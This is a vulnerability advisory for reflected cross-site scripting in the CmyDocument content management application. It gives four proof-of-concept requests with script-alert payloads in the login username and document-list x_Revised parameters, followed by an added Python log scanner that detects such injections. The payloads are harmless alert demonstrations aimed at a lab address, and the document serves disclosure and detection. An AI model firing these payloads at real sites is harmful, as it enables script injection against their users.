CmyDocument Content Management suffers from multiple cross-site scripting vulnerabilities.
Title: CmyDocument Content Management Application - XSS Vulnerabilities
Software : CmyDocument Content Management Application
Software Version : Unknown (version update : 2010-01-10)
Vendor: http://cmydocument.com/
Vulnerability Published : 2011-07-11
Vulnerability Update Time :
Status :
Impact : Medium
Bug Description :
CmyDocument Content Management Application (version update : 2010-01-10, possibly earlier versions) is vulnerable to XSS.
Proof Of Concept :
1) username in login.asp, PoC:
POST http://192.168.10.202/login.asp
------------------------------------
username="><script>alert('demonalex')</script>&password=bbb&rememberme=a&submit=+++Login+++
2) username in login2.asp, PoC:
POST http://192.168.10.202/login2.asp
------------------------------------
username="><script>alert('demonalex')</script>&password=bbb&rememberme=a&submit=+++Login+++
3) x_Revised in myDoclist.asp, PoC:
http://192.168.10.202/myDoclist.asp?x_Title=a&z_Title=LIKE&x_Revised=<SCRIPT>alert("demonalex");</SCRIPT>&z_Revised==&x_KeyWords=info&z_KeyWords=LIKE&x_owner=a&z_owner=LIKE
4) x_Revised in myWebDoclist.asp, PoC:
http://192.168.10.202/myWebDoclist.asp?x_Title=b&z_Title=LIKE&x_Revised=<SCRIPT>alert("demonalex");</SCRIPT>&z_Revised==&x_KeyWords=test&z_KeyWords=LIKE&x_owner=a&z_owner=LIKE
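Detection note (an added example, not part of the original advisory or the vendor's code): the four page/parameter pairs above can be turned into a log check that flags requests where those parameters carry HTML metacharacters, including percent-encoded and double-encoded forms. The IIS W3C field layout, the function names and the sample log lines are assumptions constructed for illustration; suspicious_params also accepts a urlencoded POST body for the two login pages where one is captured.

```python
from urllib.parse import parse_qs, unquote_plus

# Page -> parameter pairs from the advisory's proof-of-concept list (lowercased).
WATCHED = {
    "/login.asp": {"username"}, "/login2.asp": {"username"},
    "/mydoclist.asp": {"x_revised"}, "/mywebdoclist.asp": {"x_revised"},
}
HTML_META = set('<>"')  # characters the PoC values rely on to break out into markup

def decode_fully(value, rounds=3):
    """Undo nested percent-encoding (%253C -> %3C -> <); a no-op once decoded."""
    for _ in range(rounds):
        value = unquote_plus(value)
    return value

def suspicious_params(path, data):
    """Watched parameter names (query string or urlencoded body) carrying HTML metacharacters."""
    watched = WATCHED.get(path.lower(), set())
    hits = set()
    for name, values in parse_qs(data, keep_blank_values=True).items():
        if name.lower() in watched and any(HTML_META & set(decode_fully(v)) for v in values):
            hits.add(name)
    return sorted(hits)

def scan_w3c(lines):
    """Scan IIS W3C extended log lines; return (client_ip, page, params) per hit."""
    fields, findings = [], []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.strip() and not line.startswith("#"):
            row = dict(zip(fields, line.split()))
            path = row.get("cs-uri-stem", "")
            hits = suspicious_params(path, row.get("cs-uri-query", ""))
            if hits:
                findings.append((row.get("c-ip"), path, hits))
    return findings

# Constructed sample log (assumed field layout, documentation IP addresses).
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2011-07-12 09:00:01 192.0.2.10 GET /myDoclist.asp x_Title=a&x_Revised=2010-01-10 200",
    "2011-07-12 09:00:07 192.0.2.44 GET /myDoclist.asp x_Title=a&x_Revised=%3CSCRIPT%3Ealert(1)%3C/SCRIPT%3E 200",
    "2011-07-12 09:00:09 192.0.2.44 GET /myWebDoclist.asp x_Revised=%253Cb%253E&x_owner=a 200",
    "2011-07-12 09:00:12 192.0.2.10 GET /default.asp q=%3Cb%3E 200",
]

if __name__ == "__main__":
    print(*scan_w3c(SAMPLE_LOG), sep="\n")
```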
Credits : This vulnerability was discovered by demonalex(at)163(dot)com
Pentester/Researcher
Dark2S Security Team/PolyU.HK